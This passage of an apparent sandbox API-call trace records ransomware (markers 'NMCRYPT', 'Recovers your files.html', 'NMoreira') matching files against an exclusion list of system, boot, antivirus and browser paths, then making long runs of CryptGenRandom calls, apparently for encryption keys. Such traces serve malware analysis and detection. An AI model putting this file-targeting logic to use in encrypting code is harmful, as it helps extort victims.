Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*boot*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*boot*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*CONFIG.SYS*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*IO.SYS*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*MSDOS.SYS*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*NTDETECT.COM*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*ntldr*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*chrome*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*opera*") returned 0 [0154.925] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", pszSpec="*firefox*") returned 0 [0154.925] wcslen (_String="\\\\?\\") returned 0x4 [0154.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad5b8 [0154.925] wcscmp (_String1=".", _String2=".") returned 0 [0154.925] FindNextFileW (in: hFindFile=0x9ad5b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.925] wcscmp (_String1="..", _String2=".") returned 1 [0154.925] wcscmp (_String1="..", _String2="..") returned 0 [0154.925] FindNextFileW (in: hFindFile=0x9ad5b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0154.925] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0154.926] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0154.926] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\tipresx.dll.mui", pszSpec="*") returned 1 [0154.926] strlen (_Str="NMoreira") returned 0x8 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.928] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.929] CryptGenRandom (in: 